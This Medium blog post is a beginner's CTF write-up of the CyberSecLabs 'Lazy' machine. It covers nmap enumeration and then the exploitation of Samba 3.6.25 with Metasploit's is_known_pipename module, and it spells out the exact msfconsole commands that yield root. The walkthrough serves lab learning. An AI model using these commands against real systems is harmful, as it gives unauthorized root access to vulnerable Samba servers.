Open in app

Sign in

Write

Sign in

CyberSecLabs-Lazy

Software Sinner
3 min readAug 24, 2020

--

This is my 9th write up and I will be discussing my experience with the machine “lazy” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing. Lazy was a super easy machine with some googling on the samba version exposed we find a metasploit module that gives root access onto the machine.

Step 1: Enumeration

I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different type of Nmap scans because one scan may give you more then the other. The scan used default scripts -sC and version detection -sV

I used the top to bottom method when reading my scan results. SSH port 22 is usually not a great one to start off with unless it has a vulnerable version exposed then you can start off with it and see what you find. I started with port 80 which is always the port I like to start with if its available. I visited http://172.31.1.1 and saw that its running Nginx.

Did some googling on the version of Nginx found in my nmap scan and nothing interesting that can be exploited. I then proceeded to kick of a directory busting tool against http://172.31.1.1 to see what directories are exposed. This thing ran on forever with no interesting results. I went back to my nmap scan results again working my way down the list I saw that this thing has samba running on ports 139,445 with a version exposed (Samba 3.6.25). Did a searchsploit in my terminal and found an exploit available.

I then googled the exploit name followed by the keywords “rapid7” to see how I can use it in metasploit. I would of done a manual exploit if it was available. This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4.

Samba is_known_pipename() Arbitrary Module Load

Description This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14…

www.rapid7.com

Step 2: Exploitation

I fired up metasploit on my kali machine and ran the following commands:

sudo msfconsoleuse exploit/linux/samba/is_known_pipenameset payload cmd/unix/interactset RHOSTS 172.31.1.1run
The show options command will show you what you need to set in order to run the exploit

After launching the run command I typed whoami and was root ;)

oh yeah baby
Cybersecurity
Ctf
Hacking
Infosec
Cyberseclabs

--

--

Software Sinner
Software Sinner

Written by Software Sinner

138 Followers
1 Following

Penetration Tester 🦇 | https://github.com/SoftwareSinner

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams